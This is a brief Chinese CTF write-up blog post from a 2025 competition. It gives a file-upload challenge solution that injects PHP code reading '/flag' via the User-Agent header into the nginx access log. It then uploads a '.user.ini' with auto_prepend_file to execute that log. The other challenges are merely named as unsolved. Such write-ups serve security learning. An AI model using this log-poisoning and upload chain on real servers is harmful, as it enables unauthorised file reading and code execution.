黄河流域网络安全挑战赛2025

CTF 比赛
记录
发布日期:   2025-06-12

主要就来看看这个文件上传的赛题怎么解决吧!
首先是ua改为:

1
User-Agent: <?php echo file_get_contents('/flag'); ?>

然后利用.user.ini文件进行调取

1
2
3
4
5
6
------geckoformboundary55df4897335e6cbc04ca2964622ca64
Content-Disposition: form-data; name="upload_file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file="/var/log/nginx/access.log"
------geckoformboundary55df4897335e6cbc04ca2964622ca64--

最后访问/uploads/index.php就可以看见flag了

外国山海经

要打xss,不会

Message Board

很少见.xml的,没见过这种类型的

Try2Crossover

比较难的ssti

哈哈,笑死,都不会做

文章作者: wuk0Ng
文章链接: https://web-wuk0ng.github.io/2025/06/12/%E9%BB%84%E6%B2%B3%E6%9D%AF2025ctf/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 wuk0Ng !
CTF 比赛
评论
  目录